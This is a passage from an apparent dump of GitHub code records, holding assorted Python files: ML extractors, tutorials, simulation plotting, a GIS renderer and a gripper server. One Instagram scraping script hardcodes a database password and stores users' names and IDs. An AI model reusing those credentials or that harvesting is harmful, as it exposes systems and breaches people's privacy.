Defaults to 'pt'.\n return_softmax (bool): If True, the extractor returns softmaxed \n sentiment scores instead of raw model predictions.\n return_input (bool): If True, the extractor returns an additional \n feature column with the encoded sequence.\n model_kwargs (dict): Named arguments for pretrained model.\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type', \n 'return_softmax', 'return_input', 'model_class', 'model_kwargs', \n 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'tokenizer_type',\n 'return_input', 'return_softmax',)\n\n def __init__(self, \n pretrained_model='distilbert-base-uncased-finetuned-sst-2-english',\n tokenizer='bert-base-uncased',\n framework='pt',\n return_softmax=True,\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n self.return_softmax = return_softmax\n super().__init__(\n pretrained_model=pretrained_model, tokenizer=tokenizer, \n framework=framework, return_input=return_input,\n model_class='AutoModelForSequenceClassification',\n model_kwargs=model_kwargs, tokenizer_kwargs=tokenizer_kwargs)\n\n def _postprocess(self, stims, preds, tok, wds, ons, dur):\n data = preds.logits\n if self.framework == 'pt':\n data = data.detach()\n data = data.numpy().squeeze()\n if self.return_softmax:\n data = scipy.special.softmax(data) \n data = [listify(d) for d in data.tolist()]\n tok = [' '.join(wds)]\n try: \n dur = ons[-1] + dur[-1] - ons[0]\n except:\n dur = None\n ons = ons[0]\n feat = ['sent_pos', 'sent_neg']\n if self.return_input:\n data += tok\n feat += ['sequence'] \n return data, feat, ons, dur\n\n\nclass WordCounterExtractor(ComplexTextExtractor):\n\n ''' Extracts number of times each unique word has occurred within text\n\n Args:\n log_scale(bool): specifies if count values are to be returned in log-\n scale (defaults to False)\n '''\n\n _log_attributes = ('case_sensitive', 'log_scale')\n\n def __init__(self, case_sensitive=False, log_scale=False):\n self.log_scale = log_scale\n self.case_sensitive = case_sensitive\n self.features = ['log_word_count'] if self.log_scale else ['word_count']\n super().__init__()\n\n def _extract(self, stims):\n onsets = [s.onset for s in stims]\n durations = [s.duration for s in stims]\n tokens = [s.text for s in stims]\n tokens = [t if self.case_sensitive else t.lower() for t in tokens]\n word_counter = pd.Series(tokens).groupby(tokens).cumcount() + 1\n if self.log_scale:\n word_counter = np.log(word_counter)\n\n return ExtractorResult(word_counter, stims, self,\n features=self.features,\n onsets=onsets, durations=durations)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":36631,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"37697949105","text":"import multiprocessing\n\ndef calculate_square(num):\n square = num * num\n print(f\"Process {multiprocessing.current_process().name}: Square of {num} is {square}\")\n\nif __name__ == \"__main__\":\n numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n \n processes = []\n for num in numbers:\n process = multiprocessing.Process(target=calculate_square, args=(num,))\n processes.append(process)\n process.start()\n\n for process in processes:\n 
process.join()\n\n\n","repo_name":"jaisPank/assignment_2","sub_path":"answer7.py","file_name":"answer7.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18525081813","text":"# itertools: product, permutations, combinations, \n# accumulate, groupby, and infinite iterations \n\nfrom itertools import product\na = [1,2]\nb = [3,4]\nprod = product(a, b)\nprint(list(prod)) #[(1, 3), (1, 4), (2, 3), (2, 4)]\n\na = [1,2]\nb = [3]\nc = product(a, b, repeat=2)\nprint(list(c))\n\nfrom itertools import permutations \na = [1,2,3]\np = permutations(a)\nprint(list(p))\n\n\np = permutations(a, 2) # length of 2 \nprint(list(p))\n\nfrom itertools import combinations \na = [1,2,3]\nc = combinations(a, 2) # 2nd value length is required\nprint(list(c))\n\n# combinations_with_replacement \nfrom itertools import combinations, combinations_with_replacement \na = [1,2,3,4]\ncr = combinations_with_replacement(a, 2)\nprint(list(cr))\n\n# accumulate, returns running sums \nfrom itertools import accumulate \na = [1,2,3]\nacc = accumulate(a)\nprint(list(acc)) #[1, 3, 6]\n\nimport operator\na = [1,2,3,4]\nacc = accumulate(a, func=operator.mul)\nprint(list(acc)) # [1, 2, 6, 24]\n\n# return max of each comparison\na = [1,2,5,3,4]\nacc = accumulate(a, func=max) \nprint(list(acc)) \n\nfrom itertools import groupby\ndef smaller_than_3(x):\n    return x < 3 \n\na = [1,2,3,4,5]\ngroup_obj = groupby(a, key=smaller_than_3)\nfor k, v in group_obj:\n    print(k,list(v))\n# True [1, 2]\n# False [3, 4, 5]\n\na = [1,2,3,4,5]\n# use lambda to get the same result \ngroup_obj = groupby(a, key=lambda x: x<3)\nfor k, v in group_obj:\n    print(k,list(v))\n\n# group by dict key \npersons = [{'name': 'alice', 'age': 10},\n        {'name': 'bob', 'age': 10},\n        {'name': 'charlie', 'age': 15},\n        {'name': 'dav', 'age': 12}]\ngroup_obj = groupby(persons, key=lambda x: x['age'])\nfor k, v in group_obj:\n    print(k, list(v))\n# 10 [{'name': 'alice', 'age': 10}, {'name': 'bob', 'age': 10}]\n\nfrom itertools import count, cycle, repeat \nfor i in count(10):\n    print(i)\n    if i == 15:\n        break # stop at 15 \n\na = [1,2,3]\nfor i in cycle(a): # cycle 3 times \n    print(i)\n    if i == 3:\n        break # stop at 3 \n\nfor i in repeat(1, 4): # repeat 4 times \n    print(i)","repo_name":"feimvnc/ml-python","sub_path":"python-programming/itertools/iter.py","file_name":"iter.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17977567283","text":"import torch\nfrom torch.autograd import Variable\nfrom .embedder import Embedder, CatModule\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n'''\nSimple, sequential recurrent (GRU) net.\n'''\n\nclass GRUModel(nn.Module):\n\n    def cuda_if(self, tobj):\n        if torch.cuda.is_available():\n            tobj = tobj.cuda()\n        return tobj\n\n    def __init__(self, input_space, output_space, h_size=200,\n                                                  bnorm=False,\n                                                  lnorm=False,\n                                                  discrete_env=True):\n        super().__init__()\n\n        self.input_space = input_space\n        self.output_space = output_space\n        self.h_size = h_size\n        self.bnorm = bnorm\n        self.lnorm = lnorm\n        self.discrete_env = discrete_env\n\n        # Embedding Net\n        self.embedder = Embedder(self.input_space, self.h_size,\n                                 self.bnorm)\n\n        # Recurrent Network\n        self.h_init = torch.randn(1,self.h_size)\n        divisor = float(np.sqrt(self.h_size))\n        self.h_init = nn.Parameter(self.h_init/divisor)\n        self.rnn = 
nn.GRUCell(input_size=(self.h_size+self.output_space),\n hidden_size=self.h_size)\n\n # Policy\n self.pre_valpi = CatModule(nn.Sequential(\n nn.Linear(2*self.h_size, self.h_size),\n nn.ReLU()))\n self.pi = nn.Linear(self.h_size, self.output_space)\n if not self.discrete_env:\n self.logsigs = nn.Parameter(torch.zeros(1,self.output_space))\n self.value = nn.Linear(self.h_size, 1)\n\n if self.lnorm:\n self.layer_norm = nn.LayerNorm(self.h_size)\n\n def get_new_shape(self, shape, depth, ksize, padding, stride):\n new_shape = [depth]\n for i in range(2):\n new_shape.append(self.new_size(shape[i+1], ksize, padding, stride))\n return new_shape\n \n def new_size(self, shape, ksize, padding, stride):\n return (shape - ksize + 2*padding)//stride + 1\n\n def embeddings(self, state):\n \"\"\"\n Creates an embedding for the state.\n\n state - Variable FloatTensor (BatchSize, Channels, Height, Width)\n \"\"\"\n return self.embedder(state)\n\n def forward(self, x, h):\n embs = self.embeddings(x)\n val, pi, h = self.val_pi(embs, h)\n return val, pi, h\n\n def val_pi(self, state_emb, h):\n \"\"\"\n Uses the state embedding to produce an action.\n\n state_emb - the state embedding created by the emb_net\n h - the recurrent hidden state\n \"\"\"\n state_emb = self.pre_valpi(state_emb, h)\n pi = self.pi(state_emb)\n value = self.value(state_emb)\n rnn_inpt = torch.cat([state_emb, pi], dim=-1)\n h = self.rnn(rnn_inpt, h)\n if self.lnorm:\n h = self.layer_norm(h)\n if not self.discrete_env:\n sig = torch.exp(self.logsigs)+0.00001\n sig = sig.repeat(len(pi),1)\n mu = torch.tanh(pi)\n return value, (mu,sig), h\n return value, pi, h\n\n def fresh_h(self, batch_size=1):\n \"\"\"\n returns a new hidden state vector for the rnn\n \"\"\"\n return self.h_init.repeat(batch_size,1)\n\n def req_grads(self, calc_bool):\n \"\"\"\n An on-off switch for the requires_grad parameter for each internal Parameter.\n\n calc_bool - Boolean denoting whether gradients should be calculated.\n \"\"\"\n for param in self.parameters():\n param.requires_grad = calc_bool\n\n","repo_name":"grantsrb/CuriosityDriven-PPO","sub_path":"models/gru_model.py","file_name":"gru_model.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11817714763","text":"def codex(msj):\n print(\"Mensaje incriptado: \", end=\"\")\n key_word = 'MURCIELAGO'\n key = {value: key for (key, value) in enumerate(key_word)}\n for x in msj:\n print(key[x], end=\"\") if x in key else print(x, end=\"\")\n print(\"\")\n\n\nif __name__ == '__main__':\n while True:\n codex(input(\"Ingrese la palabra a incriptar:\").upper())\n","repo_name":"JNMGR14/Encryptador","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31499102344","text":"import meep as mp\nimport meep.adjoint as mpa\nimport numpy as np\nfrom autograd import numpy as npa\nfrom autograd import tensor_jacobian_product, grad\nfrom matplotlib import pyplot as plt\nimport nlopt\nfrom utils import fit_initial_params\nmp.quiet()\nimport splitter_simple as ss\nimport matplotlib.gridspec as gridspec\nfrom matplotlib_scalebar.scalebar import ScaleBar\nfrom matplotlib import colors\n\nsplitter_data = np.load(\"splitter_data.npz\")\nx = splitter_data['data']\nresults = splitter_data['results']\n\niteration = np.arange(1,x.shape[0]+1)\nbeta = [8, 32, np.inf]\nbeta_history = []\nfor iters in 
range(len(beta)):\n for i in range(ss.maxeval):\n beta_history.append(beta[iters])\n# ----------------------------------------------- #\n# Evolution plot #\n# ----------------------------------------------- #\nif 1:\n fig = plt.figure(figsize=(5.25,4.0), constrained_layout=True)\n gs0 = gridspec.GridSpec(3, 1, figure=fig, hspace=0.1, wspace=0, height_ratios=[0.25,0.25,0.5])\n\n # view the evolution of various designs using TO\n iters = [0,3,10,16,19]\n gs00 = gridspec.GridSpecFromSubplotSpec(1, len(iters), subplot_spec=gs0[0], hspace=0, wspace=0)\n for i,ki in enumerate(iters):\n ax = fig.add_subplot(gs00[i])\n ss.opt.update_design([ss.mapping(x[ki,:])],beta=beta_history[ki])\n ss.opt.plot2D(False,output_plane=mp.Volume(size=mp.Vector3(2,2)),\n eps_parameters={'resolution':100})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n \n # view the evolution of various designs using shape optimization\n iters = [21,24,26,29,-1]\n gs00 = gridspec.GridSpecFromSubplotSpec(1, len(iters), subplot_spec=gs0[1], hspace=0, wspace=0)\n for i,ki in enumerate(iters):\n ax = fig.add_subplot(gs00[i])\n ss.opt.update_design([ss.mapping(x[ki,:])],beta=beta_history[ki])\n ss.opt.plot2D(False,output_plane=mp.Volume(size=mp.Vector3(2,2)),\n eps_parameters={'resolution':100})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n \n # add the iteration plot\n splitter_data = np.load(\"splitter_data.npz\")\n x = splitter_data['data']\n results = splitter_data['results']\n sr = 0.5 - np.sqrt(results/2)\n\n splitter_data_smoothing = np.load(\"splitter_no_averaging_data.npz\")\n x_smoothing = splitter_data_smoothing['data']\n results_smoothing = splitter_data_smoothing['results']\n sr_smooth = 0.5 - np.sqrt(results_smoothing/2)\n\n gs00 = gridspec.GridSpecFromSubplotSpec(1, 2, width_ratios=[0.6,0.4], subplot_spec=gs0[2], hspace=0, wspace=0)\n ax = fig.add_subplot(gs00[0])\n #plt.plot(10*np.log10(1-results),'-o')\n plt.plot(sr*100,'-o')\n #plt.plot(10*np.log10(1-results_smoothing),'-o')\n plt.plot(sr_smooth*100,'-o')\n plt.ylabel(\"Transmission (%)\")\n plt.xlabel(\"Iteration\")\n ax.tick_params(which='both',direction='in')\n ax.xaxis.set_major_locator(plt.MaxNLocator(10))\n ax.yaxis.set_major_locator(plt.MaxNLocator(8))\n #plt.yticks([-1.5,-1,-0.5,0])\n #plt.grid(True)\n #plt.title(\"(b)\")\n\n # add the steady state plot\n ax = fig.add_subplot(gs00[1])\n ss.opt.update_design([ss.mapping(x[-1,:])],beta=beta_history[-1])\n ss.opt.sim.sources[0].src=mp.ContinuousSource(wavelength=1.55)\n ss.opt.sim.run(until=200)\n ss.opt.plot2D(False, fields=mp.Ez,\n output_plane=mp.Volume(size=mp.Vector3(3.5,3.5)),\n plot_boundaries_flag=False,plot_sources_flag=False,\n eps_parameters={'resolution':100},\n field_parameters={'alpha':0.80})\n scalebar = ScaleBar(1, \"um\", length_fraction=0.5,location='lower left',box_alpha=0,width_fraction=0.04)\n ax.add_artist(scalebar)\n plt.axis(\"off\")\n #plt.title(\"(c)\")\n\n if mp.am_master():\n plt.savefig(\"splitter.svg\",dpi=300)\n plt.show()","repo_name":"smartalecH/subpixel_smoothing","sub_path":"examples/process_splitter.py","file_name":"process_splitter.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"8297198676","text":"import cv2\nimport numpy as 
np\n\n\"\"\"\nMorphologicalTransformation\n@input: image or images to tranform\n@kernel: structuring element to do the Morphological transofration\n@type 'erosion', 'dilation', 'opening', 'closing', gradient', 'top-hat', 'black-hat'\n\"\"\"\ndef MorphologicalTransformation(input, kernel, type):\n\n if isinstance(input, (list,)):\n input = np.array(input)\n\n if input.dtype != np.uint8:\n input = np.uint8(input)\n\n list_transf = []\n for i, img in enumerate(input):\n\n if type == 'erosion':\n transf = cv2.erode(img, kernel, iterations=1)\n elif type == 'dilation':\n transf = cv2.dilate(img, kernel, iterations=1)\n elif type == 'opening':\n transf = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n elif type == 'closing':\n transf = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n elif type == 'gradient':\n transf = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n elif type == 'top-hat':\n transf = cv2.morphologyEx(img, cv2.MORPH_TOPHAT, kernel)\n elif type == 'black-hat':\n transf = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, kernel)\n else:\n raise ValueError(\"{} does not exist as Morphologycal Transformation\". format(type))\n\n list_transf.append(transf)\n\n return np.array(list_transf)","repo_name":"mcv-m6-video/mcv-m6-2018-team8","sub_path":"Week3/MorphologicTransformation.py","file_name":"MorphologicTransformation.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74580521769","text":"a, b = map(int, input().split(' '))\nn = int(input())\nf = 0\ng = 0\nended = 0\nfor _ in range(n):\n u, x, v, y = map(int, input().split(' '))\n # print(u, x, v, y, a, b, f, g)\n if ended!=0 or (x==u+v and y==u+v) or (x!=u+v and y!=u+v):\n continue\n # if ended != 0:\n # continue\n if x == u+v:\n f += 1\n if y == u+v:\n g += 1\n if f > a:\n ended = 1\n if g > b:\n ended = 2\nif ended == 1:\n print('A', g, sep='\\n')\nif ended == 2:\n print('B', f, sep='\\n')","repo_name":"Eqno/GPLT-ExerciseRecord","sub_path":"2016/preliminary/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715006264","text":"# -*- coding: utf-8 -*-\nimport datetime\n\nimport logging\nimport unicodedata\n\nfrom pyramid.httpexceptions import HTTPServerError\nfrom pyramid.path import DottedNameResolver\nfrom pyramid.request import Request\nfrom pyramid.testing import DummyRequest\nfrom pyramid_oereb.core import get_multilingual_element\n\nfrom shapely.geometry import mapping\n\nfrom pyramid_oereb import Config\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Base(object):\n def __init__(self, info):\n \"\"\"\n Creates a new base renderer instance.\n\n Args:\n info (pyramid.interfaces.IRendererInfo): Info object.\n \"\"\"\n self._info_ = info\n self._language = str(Config.get('default_language')).lower()\n\n @classmethod\n def get_symbol_ref(cls, request, record):\n \"\"\"\n Returns the link to the symbol of the specified public law restriction.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n record (pyramid_oereb.core.records.plr.PlrRecord or\n pyramid_oereb.core.records.view_service.LegendEntryRecord): The record of the public law\n restriction to get the symbol reference for.\n\n Returns:\n uri: The link to the symbol for the specified public law restriction.\n \"\"\"\n method = None\n for plr in Config.get('plrs'):\n if str(plr.get('code')).lower() == 
str(record.theme.code).lower():\n method = DottedNameResolver().resolve(plr.get('hooks').get('get_symbol_ref'))\n if callable(method):\n return method(request, record)\n log.error('No \"get_symbol_ref\" method found for theme {}'.format(record.theme.code))\n raise HTTPServerError()\n\n @classmethod\n def get_logo_ref(cls, request, logo_code, language, image_dict):\n \"\"\"\n Returns the link to the symbol of the specified logo.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n logo_code (str): Code of logo, eg. bs or ch.\n language (str): language of extract.\n image_dict (dict): dict of image\n\n Returns:\n uri: The link to the symbol for the specified logo.\n \"\"\"\n method = None\n method = DottedNameResolver().resolve(Config.get_logo_hooks().get('get_logo_ref'))\n if callable(method):\n return method(request, logo_code, language, image_dict)\n log.error('No \"get_logo_ref\" method found for logos')\n raise HTTPServerError()\n\n @classmethod\n def get_qr_code_ref(cls, request, qr_code_ref):\n \"\"\"\n Returns the link for the qr_code.\n\n Args:\n request (pyramid.request.Request): The current request instance.\n qr_code_ref (str): The string of qr-code url.\n\n Returns:\n uri: the link to the qr_code.\n \"\"\"\n method = None\n method = DottedNameResolver().resolve(Config.get_logo_hooks().get('get_qr_code_ref'))\n if callable(method):\n return method(request, qr_code_ref)\n log.error('No \"get_qr_code_ref\" method found for logos')\n raise HTTPServerError()\n\n @classmethod\n def get_response(cls, system):\n \"\"\"\n Returns the response object if available.\n\n Args:\n system (dict): The available system properties.\n\n Returns:\n pyramid.response.Response or None: The response object.\n \"\"\"\n request = system.get('request')\n if isinstance(request, Request) or isinstance(request, DummyRequest):\n return request.response\n return None\n\n @classmethod\n def get_request(cls, system):\n \"\"\"\n Returns the request object if available.\n\n Args:\n system (dict): The available system properties.\n\n Returns:\n pyramid.request.Request or None: The request object.\n \"\"\"\n request = system.get('request')\n if isinstance(request, Request) or isinstance(request, DummyRequest):\n return request\n return None\n\n @classmethod\n def date_time(cls, dt):\n \"\"\"\n Formats the date/time according to the specification.\n\n Args:\n dt (datetime.dateordatetime.timeordatetime.datetime): The datetime object.\n\n Returns:\n str: The formatted date/time.\n \"\"\"\n if isinstance(dt, datetime.date) or isinstance(dt, datetime.time)\\\n or isinstance(dt, datetime.datetime):\n return dt.strftime('%Y-%m-%dT%H:%M:%S')\n return dt\n\n @property\n def info(self):\n \"\"\" pyramid.interfaces.IRendererInfo: The passed renderer info object.\"\"\"\n return self._info_\n\n def get_localized_text(self, values, not_null=True):\n \"\"\"\n Returns the requested language of a multilingual text element.\n\n Args:\n values (str or dict): The multilingual values encoded as JSON.\n not_null (boolean): Throws an error if there is no value for this language.\n\n Returns:\n dict of str: Dictionary containing the localized representation.\n \"\"\"\n default_language = Config.get('default_language')\n if isinstance(values, dict):\n if self._language in values:\n return {\n 'Language': self._language,\n 'Text': get_multilingual_element(values, self._language, not_null)\n }\n else:\n return {\n 'Language': default_language,\n 'Text': get_multilingual_element(values, default_language, not_null)\n 
}\n        else:\n            return {\n                'Language': default_language,\n                'Text': values\n            }\n\n    def get_multilingual_text(self, values, not_null=True):\n        \"\"\"\n        Returns the set language of a multilingual text element.\n\n        Args:\n            values (str or dict): The multilingual values encoded as JSON.\n            not_null (boolean): Throws an error if there is no value for this language.\n\n        Returns:\n            list of dict: List of dictionaries containing the multilingual representation.\n        \"\"\"\n        return [self.get_localized_text(values, not_null)]\n\n    def get_localized_image(self, values):\n        \"\"\"\n        Returns the requested language of a multilingual binary image dictionary.\n\n        Args:\n            values (dict): The multilingual values encoded as JSON.\n\n        Returns:\n            dict of str: Dictionary containing the localized representation.\n        \"\"\"\n        default_language = Config.get('default_language')\n        if self._language in values:\n            return {\n                'Language': self._language,\n                'Image': values[self._language].encode()\n            }\n        else:\n            return {\n                'Language': default_language,\n                'Image': values.get(default_language).encode()\n            }\n\n    @staticmethod\n    def unaccent_lower(text):\n        \"\"\"\n        Replaces all special characters so that an alphabetical sorting can be done.\n\n        Args:\n            text (str): The text value.\n\n        Returns:\n            new_text (str): The text value converted to lower case and stripped of special characters.\n        \"\"\"\n        if text is None:\n            return ''\n        new_text = text.lower()\n        return unicodedata.normalize('NFD', new_text)\n\n    def sort_by_localized_text(self, multilingual_elements, value_accessor, not_null=True):\n        \"\"\"\n        Sort a list of translated text elements alphabetically.\n\n        Args:\n            multilingual_elements (list of dict): A list of multilingual elements\n                or dict that contains multilingual elements.\n            value_accessor (function(dict)->string): A function to access the\n                text of a multilingual object to use to sort the list\n\n        Returns:\n            list of dict: Alphabetically and language specific sorted elements\n                if translations exist or the list of unsorted elements if\n                sorting failed.\n\n        \"\"\"\n        try:\n            # Sort the list only if translations exist.\n            return sorted(\n                multilingual_elements,\n                key=lambda element: self.unaccent_lower(\n                    self.get_localized_text(value_accessor(element), not_null)['Text']\n                )\n            )\n\n        except AttributeError as ex:\n            log.warn('Elements can not be sorted: {0}'.format(ex))\n            return multilingual_elements\n\n    @staticmethod\n    def from_shapely(geom):\n        \"\"\"\n        Formats shapely geometry for rendering according to the federal specification.\n\n        Args:\n            geom (shapely.geometry.base.BaseGeometry): The geometry object to be formatted.\n\n        Returns:\n            dict: The formatted geometry.\n        \"\"\"\n        geom_dict = {\n            'type': geom.geom_type,\n            'coordinates': mapping(geom)['coordinates'],\n            'crs': 'EPSG:{srid}'.format(srid=Config.get('srid'))\n            # isosqlmmwkb only used for curved geometries (not supported by shapely)\n            # 'isosqlmmwkb': b64.encode(geom.wkb)\n        }\n        return geom_dict\n","repo_name":"openoereb/pyramid_oereb","sub_path":"pyramid_oereb/core/renderer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"13924084231","text":"import statistics\nimport numpy as np\n\n\ndef time2freq(T):\n    \"\"\"\n    Converts the time vector to a frequency vector\n    :param T: Time vector\n    :return: Frequency vector\n    \"\"\"\n\n    dT = statistics.mean(np.diff(T))\n    nT = len(T)\n    nT2 = nT/2\n    df = 1/(dT*nT)\n    return df*(np.arange(-nT2, nT2))
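\n\n\n# Added usage sketch (illustrative values only, not part of the original source):\n#   T = np.arange(0, 1, 1e-3)   # 1000 samples spaced dT = 1 ms\n#   F = time2freq(T)            # 1000 bins spaced df = 1/(nT*dT) = 1 Hz, covering -500..499 Hz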
nT2))\n","repo_name":"mateussc12/ROF_DPO_DPSK","sub_path":"funcs/time2freq.py","file_name":"time2freq.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70350544487","text":"import pytest\n\nfrom multiprocessing import Queue\nfrom promptflow.executor._line_execution_process_pool import QueueRunStorage\nfrom promptflow.contracts.run_info import FlowRunInfo\nfrom promptflow.contracts.run_info import RunInfo as NodeRunInfo\n\n\n@pytest.mark.unittest\nclass TestLineExecutionProcessPool:\n def test_persist_node_run(self):\n queue = Queue()\n run_storage = QueueRunStorage(queue)\n node_run_info = NodeRunInfo(\n node=\"node1\",\n flow_run_id=\"flow_run_id\",\n run_id=\"run_id\",\n status=\"status\",\n inputs=\"inputs\",\n output=\"output\",\n metrics=\"metrics\",\n error=\"error\",\n parent_run_id=\"parent_run_id\",\n start_time=\"start_time\",\n end_time=\"end_time\",\n index=\"index\",\n api_calls=\"api_calls\",\n variant_id=\"variant_id\",\n cached_run_id=\"cached_run_id\",\n cached_flow_run_id=\"cached_flow_run_id\",\n logs=\"logs\",\n system_metrics=\"system_metrics\",\n result=\"result\",\n )\n run_storage.persist_node_run(node_run_info)\n assert queue.get() == node_run_info\n\n def test_persist_flow_run(self):\n queue = Queue()\n run_storage = QueueRunStorage(queue)\n flow_run_info = FlowRunInfo(\n run_id=\"run_id\",\n status=\"status\",\n inputs=\"inputs\",\n output=\"output\",\n metrics=\"metrics\",\n request=\"request\",\n root_run_id=\"root_run_id\",\n source_run_id=\"source_run_id\",\n flow_id=\"flow_id\",\n error=\"error\",\n parent_run_id=\"parent_run_id\",\n start_time=\"start_time\",\n end_time=\"end_time\",\n index=\"index\",\n api_calls=\"api_calls\",\n variant_id=\"variant_id\",\n system_metrics=\"system_metrics\",\n result=\"result\",\n )\n run_storage.persist_flow_run(flow_run_info)\n assert queue.get() == flow_run_info\n","repo_name":"Indie365/promptflow","sub_path":"src/promptflow/tests/executor/unittests/storage/test_queue_run_storage.py","file_name":"test_queue_run_storage.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69831644968","text":"import time\r\nimport datetime\r\nfrom datetime import datetime as dt\r\nimport ibm_db_dbi as db\r\nimport pandas\r\nimport instaloader\r\nimport time\r\nfrom itertools import dropwhile, takewhile\r\nimport urllib\r\nfrom urllib.request import urlretrieve\r\nimport os\r\ndef get_channels():\r\n\r\n connection_text = \"DATABASE=PRODDB;HOSTNAME=192.168.252.11;PORT=50000;PROTOCOL=TCPIP;UID=db2inst1;PWD=Qjuehnghj1;\"\r\n con = db.connect(connection_text, \"\", \"\")\r\n cursor = con.cursor()\r\n sql = 'select channel_id from tl_media_channels where source_id = 1002 order by id limit(10)'\r\n df = pandas.read_sql(sql, con)\r\n\r\n df['channel_id'] = df['CHANNEL_ID'].str.replace(\"'\", \"\")\r\n df1 = df['channel_id'].values.tolist()\r\n print(df1)\r\n channels_from_db = []\r\n\r\n for r in df1:\r\n print(r)\r\n channels_from_db.append(r)\r\n return channels_from_db\r\n\r\n\r\nL = instaloader.Instaloader()\r\n\r\n\r\nchannel_id = {'5644930763'}\r\n\r\nconnection_text = \"DATABASE=PRODDB;HOSTNAME=192.168.252.11;PORT=50000;PROTOCOL=TCPIP;UID=db2inst1;PWD=Qjuehnghj1;\"\r\ncon = db.connect(connection_text, \"\", \"\")\r\ncursor = con.cursor()\r\n\r\nfor id in channel_id:\r\n\r\n print('Downloading posts from ', id)\r\n profile = 
instaloader.Profile.from_id(L.context, id)\r\n group_name = profile.username\r\n group_id = str(profile.userid)\r\n count = profile.mediacount\r\n posts = profile.get_posts()\r\n print(count)\r\n if count > 100:\r\n stop = 100\r\n else:\r\n stop = count\r\n\r\n n = 1\r\n newpath = r'C:/Users/User/PycharmProjects/post_downloads/Media/' + profile.username\r\n if not os.path.exists(newpath):\r\n os.makedirs(newpath)\r\n for post in posts:\r\n\r\n likes = post.get_likes()\r\n for like in likes:\r\n user_name = like.username\r\n user_id = str(like.userid)\r\n count = 1\r\n print(user_name, ' ', user_id)\r\n time.sleep(1)\r\n cursor.execute('select count from insta_like_counter where user_id = \\'{user_id}\\' and group_id = \\'{group_id}\\''.format(user_id=user_id, group_id=group_id))\r\n one_row = cursor.fetchone()\r\n\r\n if one_row is not None:\r\n count = one_row[0] + 1\r\n print('Update {user_id} object.'.format(user_id=user_id), datetime.datetime.now())\r\n sql_update = \"update insta_like_counter set count = {count} where user_id = \\'{user_id}\\' and group_id = \\'{group_id}\\'\".format(count=count, user_id=user_id, group_id=group_id)\r\n cursor.execute(sql_update)\r\n else:\r\n print('Insert ', user_id, 'object.', datetime.datetime.now())\r\n sql_1_test = \"insert into insta_like_counter(group_name, group_id, user_id, user_name, count) values (?,?,?,?,?)\"\r\n cursor.execute(sql_1_test, (group_name, group_id, user_id, user_name, count))\r\n con.commit()\r\n\r\ncursor.close()\r\ncon.close()","repo_name":"IbragimovaS/Parser","sub_path":"insta_likes.py","file_name":"insta_likes.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19757338471","text":"#!/usr/bin/python3\n\n\n\nfrom robotiq_control.msg import CommandRobotiqGripperAction\nfrom robotiq_control.msg import CommandRobotiqGripperFeedback\nfrom robotiq_control.msg import CommandRobotiqGripperResult\n\n#from multinherit.multinherit import multi_super #pip3 install multinherit\nfrom robotiq_control.GripperCommon import RobotiqGripperType\nfrom robotiq_control.GripperCmd import GripperCommand\nfrom sensor_msgs.msg import JointState\nimport time\nfrom threading import Thread\nimport rospy\nimport actionlib\n\n\n\nGOAL_DETECTION_THRESHOLD = 0.01 # Max deviation from target goal to consider as goal \"reached\"\n \n\nclass RobotiqGripperActionServer(actionlib.SimpleActionServer, GripperCommand, rospy.Publisher):\n\n def __init__(self, action_server_name, gripper_type, slave_id = 0, usbComPort='/dev/ttyUSB0',baudRate=115200):\n self._action_name = action_server_name\n self.__feedback = CommandRobotiqGripperFeedback()\n self.__result = CommandRobotiqGripperResult()\n self._processing_goal = True\n self._seq = 0\n \n GripperCommand.__init__(self, gripper_type, id=slave_id, comPort=usbComPort ,baud_rate=baudRate)\n 